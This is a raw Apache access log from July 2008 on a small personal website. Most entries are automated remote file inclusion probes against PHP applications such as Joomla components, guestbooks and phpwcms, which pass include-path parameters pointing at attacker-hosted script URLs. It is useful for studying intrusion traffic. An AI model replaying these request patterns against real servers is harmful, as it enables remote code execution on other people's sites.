88.255.236.6 - - [09/Jul/2008:21:56:10 -0500] "GET /logs//?pg=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 200 90753 "-""libwww-perl/5.805"
65.91.249.193 - - [09/Jul/2008:22:04:14 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 330 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:22:04:14 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 330 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:22:04:14 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 325 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:22:04:14 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 325 "-""libwww-perl/5.813"
72.55.146.38 - - [09/Jul/2008:22:21:42 -0500] "GET /logs/access_log.1189900800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.55.146.38 - - [09/Jul/2008:22:21:42 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.55.146.38 - - [09/Jul/2008:22:21:43 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
72.55.146.38 - - [09/Jul/2008:22:21:51 -0500] "GET /logs/access_log.1207785600/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.234.133.173 - - [09/Jul/2008:22:24:47 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
85.234.133.173 - - [09/Jul/2008:22:24:47 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
213.246.61.4 - - [09/Jul/2008:22:27:38 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://lodolo.com/x?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
213.246.61.4 - - [09/Jul/2008:22:27:39 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://lodolo.com/x?? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
213.246.61.4 - - [09/Jul/2008:22:27:56 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://lodolo.com/x?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
213.246.61.4 - - [09/Jul/2008:22:27:57 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://lodolo.com/x?? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
74.6.8.88 - - [09/Jul/2008:22:27:57 -0500] "GET /logs/access_log.1169942400 HTTP/1.0" 200 125450 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.18.142.194 - - [09/Jul/2008:22:28:15 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
64.18.142.194 - - [09/Jul/2008:22:28:15 -0500] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
208.115.34.17 - - [09/Jul/2008:22:28:47 -0500] "GET /logs/access_log.1183507200//ws/get_events.php?includedir=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
208.115.34.17 - - [09/Jul/2008:22:28:47 -0500] "GET //ws/get_events.php?includedir=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
208.115.34.17 - - [09/Jul/2008:22:28:47 -0500] "GET /logs//ws/get_events.php?includedir=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
213.246.61.4 - - [09/Jul/2008:22:28:48 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://lodolo.com/x?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
213.246.61.4 - - [09/Jul/2008:22:28:50 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://lodolo.com/x?? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
74.6.8.88 - - [09/Jul/2008:22:32:32 -0500] "GET /memorial/index.htm HTTP/1.0" 200 817 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
192.80.24.35 - - [09/Jul/2008:22:34:00 -0500] "GET /logs/!scanhttp://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
192.80.24.35 - - [09/Jul/2008:22:34:02 -0500] "GET /!scanhttp://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
85.114.135.126 - - [09/Jul/2008:22:36:06 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
85.114.135.126 - - [09/Jul/2008:22:36:06 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
85.114.135.126 - - [09/Jul/2008:22:36:06 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
85.114.135.126 - - [09/Jul/2008:22:36:06 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
66.7.203.201 - - [09/Jul/2008:22:36:46 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
66.7.203.201 - - [09/Jul/2008:22:36:46 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
66.7.203.201 - - [09/Jul/2008:22:36:46 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
66.7.203.201 - - [09/Jul/2008:22:36:46 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
66.7.203.201 - - [09/Jul/2008:22:36:46 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
66.7.203.201 - - [09/Jul/2008:22:36:47 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
66.7.203.201 - - [09/Jul/2008:22:37:00 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
66.7.203.201 - - [09/Jul/2008:22:37:01 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
74.55.113.226 - - [09/Jul/2008:22:37:05 -0500] "GET /logs/aedatingCMS.php?dir[inc]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
74.55.113.226 - - [09/Jul/2008:22:37:05 -0500] "GET /aedatingCMS.php?dir[inc]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
192.80.24.35 - - [09/Jul/2008:22:43:04 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
202.174.80.161 - - [09/Jul/2008:22:43:04 -0500] "GET /logs/component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.leokaris.com/bajo.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
192.80.24.35 - - [09/Jul/2008:22:43:04 -0500] "GET //skin/zero_vote/error.php?dir=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
202.174.80.161 - - [09/Jul/2008:22:43:05 -0500] "GET /component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.leokaris.com/bajo.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
202.39.48.108 - - [09/Jul/2008:22:44:29 -0500] "GET /page.php5?id=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
202.39.48.108 - - [09/Jul/2008:22:44:29 -0500] "GET /logs/page.php5?id=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
217.160.76.187 - - [09/Jul/2008:22:49:04 -0500] "GET /logs//?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 200 90753 "-""libwww-perl/5.76"
217.160.76.187 - - [09/Jul/2008:22:49:05 -0500] "GET //?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.76"
217.160.76.187 - - [09/Jul/2008:22:49:11 -0500] "GET /logs//?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 200 90753 "-""libwww-perl/5.76"
217.160.76.187 - - [09/Jul/2008:22:49:11 -0500] "GET //?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.76"
71.232.198.66 - - [09/Jul/2008:22:51:26 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.yahoo.com/search?ei=UTF-8&fr=slv8-reg&p=bob+shaw+tattoo+flash&rs=0&fr2=rs-top""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322)"
71.232.198.66 - - [09/Jul/2008:22:51:26 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322)"
71.232.198.66 - - [09/Jul/2008:22:51:26 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322)"
217.160.76.187 - - [09/Jul/2008:22:52:52 -0500] "GET /logs//?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 200 90753 "-""libwww-perl/5.76"
217.160.76.187 - - [09/Jul/2008:22:52:53 -0500] "GET //?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.76"
205.234.252.183 - - [09/Jul/2008:22:53:11 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
205.234.252.183 - - [09/Jul/2008:22:53:11 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
77.221.130.8 - - [09/Jul/2008:22:54:12 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
77.221.130.8 - - [09/Jul/2008:22:54:13 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
193.178.228.12 - - [09/Jul/2008:22:56:01 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
193.178.228.12 - - [09/Jul/2008:22:56:01 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
202.39.48.108 - - [09/Jul/2008:22:58:58 -0500] "GET //?pag=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
202.39.48.108 - - [09/Jul/2008:22:59:00 -0500] "GET /logs//?pag=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 200 90753 "-""libwww-perl/5.65"
66.225.192.5 - - [09/Jul/2008:23:01:54 -0500] "GET /logs//?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 200 90753 "-""libwww-perl/5.810"
66.225.192.5 - - [09/Jul/2008:23:01:54 -0500] "GET //?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
74.52.139.226 - - [09/Jul/2008:23:03:42 -0500] "GET /logs/component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
74.52.139.226 - - [09/Jul/2008:23:03:42 -0500] "GET /component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
64.18.142.194 - - [09/Jul/2008:23:04:34 -0500] "GET /logs/access_log.1207785600//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 372 "-""libwww-perl/5.811"
64.18.142.194 - - [09/Jul/2008:23:04:34 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
64.18.142.194 - - [09/Jul/2008:23:04:34 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
210.87.251.43 - - [09/Jul/2008:23:06:04 -0500] "GET /index.php?pagename=http://coprald.name.md/xxx/test.txt??? HTTP/1.0" 404 281 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
192.80.24.35 - - [09/Jul/2008:23:08:36 -0500] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
192.80.24.35 - - [09/Jul/2008:23:08:36 -0500] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
202.221.143.111 - - [09/Jul/2008:23:11:28 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
202.221.143.111 - - [09/Jul/2008:23:11:28 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
87.242.99.137 - - [09/Jul/2008:23:14:28 -0500] "GET /logs//modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
87.242.99.137 - - [09/Jul/2008:23:14:29 -0500] "GET //modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
87.101.4.49 - - [09/Jul/2008:23:14:32 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
87.101.4.49 - - [09/Jul/2008:23:14:32 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
194.79.75.195 - - [09/Jul/2008:23:18:17 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://kingsofwarcraft.com/info? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
194.79.75.195 - - [09/Jul/2008:23:18:17 -0500] "GET /modules/My_eGallery/index.php?basepath=http://kingsofwarcraft.com/info? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
74.6.8.88 - - [09/Jul/2008:23:19:37 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.88 - - [09/Jul/2008:23:19:37 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 2922 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.234.133.173 - - [09/Jul/2008:23:19:52 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
85.234.133.173 - - [09/Jul/2008:23:19:52 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
87.101.4.49 - - [09/Jul/2008:23:22:44 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
87.101.4.49 - - [09/Jul/2008:23:22:44 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
193.178.228.12 - - [09/Jul/2008:23:26:02 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
193.178.228.12 - - [09/Jul/2008:23:26:02 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
202.174.80.161 - - [09/Jul/2008:23:27:43 -0500] "GET /logs/access_log.1207785600/component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.leokaris.com/bajo.txt?? HTTP/1.1" 404 359 "-""libwww-perl/5.79"
202.174.80.161 - - [09/Jul/2008:23:27:44 -0500] "GET /component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.leokaris.com/bajo.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
202.174.80.161 - - [09/Jul/2008:23:27:44 -0500] "GET /logs/component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.leokaris.com/bajo.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
66.7.203.201 - - [09/Jul/2008:23:34:11 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 361 "-""libwww-perl/5.811"
66.7.203.201 - - [09/Jul/2008:23:34:11 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.811"
77.91.229.30 - - [09/Jul/2008:23:36:42 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
77.91.229.30 - - [09/Jul/2008:23:36:42 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
66.7.203.201 - - [09/Jul/2008:23:37:35 -0500] "GET /logs/access_log.1183507200//calendar/tools/send_reminders.php?noSet=0&includedir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
66.7.203.201 - - [09/Jul/2008:23:37:35 -0500] "GET //calendar/tools/send_reminders.php?noSet=0&includedir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
66.7.203.201 - - [09/Jul/2008:23:37:35 -0500] "GET /logs//calendar/tools/send_reminders.php?noSet=0&includedir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
91.198.175.18 - - [09/Jul/2008:23:41:36 -0500] "GET /logs/component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.808"
91.198.175.18 - - [09/Jul/2008:23:41:36 -0500] "GET /component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.808"
74.6.8.88 - - [09/Jul/2008:23:41:42 -0500] "GET /logs/access_log.1159833600 HTTP/1.0" 200 150675 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.88 - - [09/Jul/2008:23:41:50 -0500] "GET /tattoo/set2.htm HTTP/1.0" 200 2378 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.220.215.63 - - [09/Jul/2008:23:47:18 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://paradiseinhell.altervista.org/idCrystal.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
74.220.215.63 - - [09/Jul/2008:23:47:18 -0500] "GET //Neos_Chronos/header.php?base_folder=http://paradiseinhell.altervista.org/idCrystal.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
74.220.215.63 - - [09/Jul/2008:23:48:28 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://paradiseinhell.altervista.org/idCrystal.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.220.215.63 - - [09/Jul/2008:23:48:28 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://paradiseinhell.altervista.org/idCrystal.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
85.234.133.173 - - [09/Jul/2008:23:48:38 -0500] "GET /logs/common/db.php?commonpath=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
85.234.133.173 - - [09/Jul/2008:23:48:38 -0500] "GET /common/db.php?commonpath=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
88.255.236.6 - - [09/Jul/2008:23:49:36 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.255.236.6 - - [09/Jul/2008:23:49:37 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
62.75.171.20 - - [09/Jul/2008:23:50:24 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
62.75.171.20 - - [09/Jul/2008:23:50:24 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
217.16.26.124 - - [09/Jul/2008:23:52:36 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
217.16.26.124 - - [09/Jul/2008:23:52:36 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
85.114.135.126 - - [09/Jul/2008:23:53:42 -0500] "GET /logs//config/dbutil.bck.php?confdir=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.114.135.126 - - [09/Jul/2008:23:53:43 -0500] "GET /logs//config/dbutil.bck.php?confdir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.114.135.126 - - [09/Jul/2008:23:53:43 -0500] "GET //config/dbutil.bck.php?confdir=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
85.114.135.126 - - [09/Jul/2008:23:53:43 -0500] "GET //config/dbutil.bck.php?confdir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
74.52.139.226 - - [09/Jul/2008:23:57:11 -0500] "GET /logs/access_log.1207785600/component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 359 "-""libwww-perl/5.810"
72.55.146.38 - - [10/Jul/2008:00:02:31 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
72.55.146.38 - - [10/Jul/2008:00:02:31 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
70.85.102.132 - - [10/Jul/2008:00:03:17 -0500] "GET /logs//index.php?dept=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
70.85.102.132 - - [10/Jul/2008:00:03:18 -0500] "GET //index.php?dept=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
194.79.75.195 - - [10/Jul/2008:00:08:35 -0500] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://knightkittens.com/images/ma??? HTTP/1.1" 404 304 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
194.79.75.195 - - [10/Jul/2008:00:08:35 -0500] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://knightkittens.com/images/ma??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
77.221.130.8 - - [10/Jul/2008:00:08:41 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
77.221.130.8 - - [10/Jul/2008:00:08:41 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
217.16.26.124 - - [10/Jul/2008:00:19:49 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
217.16.26.124 - - [10/Jul/2008:00:19:50 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
